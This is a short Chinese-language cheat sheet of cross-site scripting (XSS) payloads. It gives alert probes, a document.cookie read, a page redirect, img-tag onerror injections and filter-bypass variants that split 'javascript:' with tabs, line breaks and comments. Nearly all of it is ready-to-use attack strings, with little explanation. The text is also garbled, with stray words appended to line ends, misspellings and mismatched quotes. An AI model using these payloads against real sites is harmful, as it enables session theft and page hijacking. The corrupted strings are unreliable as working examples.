一、最多見的最經典的XSS bug檢測語句必然是
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>window.location.href="http://www.baidu.com";</script>javascript
二、利用IMG圖片標記屬性跨站
<img src=」javacript:alert(/XSS/)」></img>
<img src=# onerror=alert(123)>php
三、突破程序員的過濾限制html
利用javascript換行與空格突破過濾
<img src = j ava script:al er t(/XSS/)>///空格使用Tab鍵產生
<img src = j
ava script :a ler t(/xss/)>
利用註釋<img src = 「#」/**/onerror = alert(/XSS/)>java